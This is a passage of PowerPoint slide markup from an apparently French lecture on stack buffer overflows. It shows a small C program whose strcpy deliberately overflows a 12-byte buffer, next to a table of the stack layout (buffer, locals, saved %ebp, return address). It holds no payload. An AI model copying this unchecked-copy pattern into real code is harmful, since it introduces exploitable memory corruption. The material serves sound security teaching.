          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>x, y;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>buffer[12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/* L'instruction suivante entraînera un débordement de tampon */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(buffer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1100" dirty="0" smtClean="0">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s-ES" sz="1100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1100" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Rectangle 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="123290" y="4039355"/>
            <a:ext cx="4695290" cy="17225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07000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>main()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> somme;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">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fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> a = 10;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>     char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = "This is definitely longer than 12";</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">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fr-FR" sz="1100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(a, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    somme = a + a ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    return 1;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">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fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="49" name="Espace réservé du contenu 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="741305446"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7900795" y="1803221"/>
          <a:ext cx="2001416" cy="4352256"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="500354"/>
                <a:gridCol w="500354"/>
                <a:gridCol w="500354"/>
                <a:gridCol w="500354"/>
              </a:tblGrid>
              <a:tr h="359006">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnT w="12700" cmpd="sng">
                      <a:noFill/>
                    </a:lnT>
                  </a:tcPr>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="359006">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Valeur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>str</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (pointeur)</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85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r>
              <a:tr h="359006">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Valeur de</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> a</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85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r>
              <a:tr h="513631">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Adresse de retour (Return address)</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="359006">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>%</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>ebp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t> précédent</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="359006">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Valeur de x</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="75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r>
              <a:tr h="359006">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Valeur de y</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="75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r>
              <a:tr h="480202">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>[11]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>[10]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>[9]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>[8]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="395099">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
